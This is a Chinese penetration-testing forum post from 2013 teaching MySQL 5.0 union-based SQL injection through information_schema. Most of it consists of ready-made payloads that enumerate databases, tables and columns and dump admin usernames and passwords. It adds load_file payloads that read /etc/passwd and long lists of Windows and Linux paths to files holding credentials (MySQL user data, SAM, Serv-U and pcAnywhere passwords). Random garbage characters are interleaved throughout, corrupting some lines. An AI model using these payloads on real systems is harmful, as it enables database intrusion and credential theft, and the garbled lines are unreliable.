中国网络渗透测试联盟

标题: mysql5.0注入原理 [打印本页]

---

作者: admin    时间: 2013-3-7 13:24
标题: mysql5.0注入原理
记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。
' O  ~$ k" F8 W5 ^- e) v* P
! w* t- \1 L2 o4 @

Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
& p& J: o2 n: J存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
3 F# B5 q: a. N; U. [/ c1.得到所有数据库名：
1 e) j/ Z- V' {4 V, I1 p7 Z|SCHEMATA ->存储数据库名的表
( _- M* c. p0 N) Y, }/ N|—字段：SCHEMA_NAME ->数据库名称
6 s" f! J" w, e# g  b6 p
|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名

|COLUMNS ->存储的字段名表
|—字段：TABLE_SCHEMA ->该字段所属数据库名
6 b1 Z7 ]9 k' g) o7 h|—字段：TABLE_NAME ->存储所属表的名称
6 C2 y- D4 d* @8 F; I
|—字段：COLUMN_NAME ->该字段的名称
. F3 I. x# i1 l' w; d# i
1 i/ `% r! U5 _; [0 I( V: y6 y- i#########################################################################
$ N3 h, l2 g9 Q1 }# I##

0×001 获取系统信息:

- N' x5 a/ S0 r# b+ e7 tunion select 1,2,3,4,5,concat
/ z) I% ^+ N& r- c(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
8 |$ [0 k7 B0 d(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
! {' {" G7 D% g# V5 l& `; C
/*

0 S# Z  b2 ]/ q2 I3 i@@global.version_compile_os 获取系统版本
7 T+ F! z( G: v8 V+ ^, o6 F' }1 {
" n) Z3 W. Y' h/ A: g3 s- e@@datadir 数据库路径
7 w6 A0 B; X; r1 @* jdatabase() 当前数据库名称
0x3c62723e 换行HEX值
, Y8 z1 f. T, }. u/ K: f
*/

- m$ T8 e6 r! j) N& ~######################################################################
( U1 T! B* a. ?7 }
0×002 获取表名
/ b1 q# `/ x# S! T
1 I6 P& J$ |' f' Iunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from
# {2 R. I# E" ~; F. u4 }" H6 _information_schema.tables where table_schema=0x67617264656e /*

, F8 D1 z# i0 \/*
# j) Q3 ~& A* N1 h& I- W
0x67617264656e 为当前数据库名
  E7 M5 K+ T+ \* |/ \' X* u0 C6 I
; K9 N, a8 ~' Z- m3 M! \group_concat(table_name) 使用group_concat函数 一步获得该库所有表名

; k; ]' D' O" Y) P4 f*/
" O; W) x$ [0 I% W. @
######################################################################
4 ?6 ^: X6 o  A5 c3 A3 e9 V
0×003 获取字段
  m$ C/ J' ?$ |/ ^
. n' h: ~- H  G! t# [7 G' O9 Q8 {union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
% y+ U0 U& W8 ^information_schema.columns where table_name=0x61646d696e and
. T2 h+ p7 h6 L7 X6 A# I! L

% h! ]9 p6 X' o8 _  n( K! ntable_schema=0x67617264656e limit 1 /*

' t! e' a+ G9 }3 e5 k. }$ }/*
" W4 S$ ~- S1 F. G/ x, O
$ E& Y1 c- e" a* B  g6 qgroup_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段
5 r8 n8 f: k( H' J- b4 I- F
' o( h& S0 u, X% s0x61646d696e ->选择一个表

0x67617264656e ->数据库名
3 U  t% b7 \$ X2 g2 G2 }- s, l4 P4 i
8 u3 T3 {! T' W- u  f" ~$ q6 ]*/

#####################################################################

% m8 u$ T& u# R5 ~6 P0×004 获取数据
0 D- `: O0 z, H, L
0 a, s5 A$ J, w% bunion select 1,2,3
2 z" m1 g. d- S/ L,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

union select 1,group_concat(id),group_concat(adname),4,5,group_concat
+ Y9 a; p7 G' j* R0 H0 @6 W- \(adpassword),6,7,8 from admin
, a1 _( l. F4 S# }1 z
/*

2 w' G! U; Q" [7 v7 Y, j0x3c62723e 换行符号HEX编码

group_concat 同时获得该字段所有数据
; x% S. G& K# k* j% J
' v- A- T, i7 o4 K/ s*/

) S, X# ]% K* |; q6 N



7 }" \' z8 r& {* J5 y0 y+ w- {顺便添加一些mysql注入时非常有用的一些东西
+ n6 `1 u* i* |& d. h
% ?) F5 s8 f% ~0 t+ s1 H9 o简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。
# R  p1 }8 d( u$ s2 l0 i$ Q) ]1 Y5 c
! C* {( h3 z* ~. |9 ?3 w+ c5 r, D1:system_user() 系统用户名
2:user()        用户名
6 c' k0 g, ^9 P# O3:current_user()  当前用户名
1 a# x8 o, k2 q' |3 A. g4:session_user()连接数据库的用户名
6 Z, g2 {3 q: t+ C6 B) G5:database()    数据库名
6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
8@datadir     读取数据库路径
3 C1 X" x' U/ @7 |! h: i# L4 b8 l8 n9@basedir    MYSQL 安装路径
10@version_compile_os   操作系统  Windows Server 2003,
收集的一些路径：
WINDOWS下:
* L+ O& D3 X6 E- e- g4 P: tc:/boot.ini          //查看系统版本
7 ^) a1 B; r8 x4 [9 Vc:/windows/php.ini   //php配置信息
( g2 i1 c, Y, ?& u# _' hc:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
$ J, ]  z4 H$ k) a: _1 m% w  Ac:/winnt/php.ini
! |3 W" t7 X5 s8 }( f5 y3 C7 V  pc:/winnt/my.ini
: Q( w- y$ ^' ~# o, i! jc:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
* D1 y! B: J( n- `c:\Program Files\Serv-U\ServUDaemon.ini
9 g% F2 F7 @$ x9 [c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
0 z; e* H% X: k6 B. Y: O. A& W0 Z9 [C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
! V! G9 J( g& y; b# {1 Xc:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
- Z3 z- H3 A1 J& i

/ w  a. Y# y; N: G+ O4 kc:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
" t( f" |  i- V8 ]2 R5 i. fC:\Program Files\mysql\my.ini
8 U' Q- n: O6 @8 j# _c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

LUNIX/UNIX下:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
8 }* |. k- m4 N& D6 l/usr/local/apache2/conf/httpd.conf
: k6 y. n! e$ ^% ^5 T- ]/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
$ }7 y! `6 D3 L/ j) p) Y: T& ~/etc/sysconfig/iptables //从中得到防火墙规则策略
5 f5 y( ?/ ^5 m1 Y+ S" H; l/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
9 X; I8 b; k8 v& V8 F$ R! k/etc/redhat-release //系统版本
1 M- ^/ B2 d% x: X0 ?9 s/etc/issue
/ v8 T1 {1 V! c/etc/issue.net
/usr/local/app/php5/lib/php.ini //PHP相关设置
8 K' I) {7 G0 b5 `7 s/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
9 [& p' G/ G1 z- _& K/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
3 F- J& V8 f8 u; e6 K/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
: D( K% D; {0 Q# g0 `, N" m+ D/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
* S9 ]. Q1 j4 p: X5 L% T9 \/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
* J6 F: m: d5 U( M# N8 n/etc/sysconfig/iptables 查看防火墙策略
) i; N" R) E% j5 _/ j) Xload_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
" z3 O0 m2 F" ?0 @0 H+ ?replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
+ ~9 @7 u$ J( j/ _
' ~& g: k: Q" n- a6 o- A

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2